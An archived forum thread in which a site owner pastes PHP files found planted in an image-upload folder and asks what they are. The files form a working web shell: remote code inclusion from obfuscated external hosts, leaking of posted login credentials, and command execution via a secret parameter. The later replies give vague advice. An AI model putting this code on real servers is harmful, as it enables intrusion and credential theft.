Jump to content

Archived

This topic is now archived and is closed to further replies.

pbjorge12

Weird Files Created!

Recommended Posts

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
[/code]

Create.php
[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
[/code]

.htaccess
[code]Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php
[/code]

Note: Different file name's with different content were in eac folder...
Note2: The files were created by "nobody" the default apache user...

Is this normal? What is it? What is its purpose?

Share this post


Link to post
Share on other sites
i dont know but i also got a .php files put in my folder one day and it outputted all my code within that folder.

scary?

Share this post


Link to post
Share on other sites
take away the [][] brackets to see the code larger ok

Share this post


Link to post
Share on other sites

if you find that you havent done any valadation on users uploading the correct file exstention then post the upload revelent code.

if you have done that read on!


ok you made me paranoid know what i did 5 min ago is cheek the phpmyadmin for any databases that i didnt no off being mine you should take these steps.

i had no extra ones thank god.

know what i understand is that if a hacker got your mysql deatails then they can use your database for there own needs and in some cases also use a folder you didnt know about but the best pratice is to cheeck the database entrys and if there all yours lol............... your ok you can sleep tonight ok.

but

in the worse sititation and a person has leached onto your database then you have to reset the passwords on all your scripts and database ok.

and then delete any unknown folders and files .

i would sugest a fresh copy of everthink ok.

scary good luck.

Share this post


Link to post
Share on other sites
Well...After doing some reasearch this is an exploit that works with directories with 777 permissions (Which mine is).
I am still looking for a fix...

Share this post


Link to post
Share on other sites
exsplain more what do you mead an exsploit


what they get in 777 folders how?

lol you make me more worried?

Share this post


Link to post
Share on other sites

×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.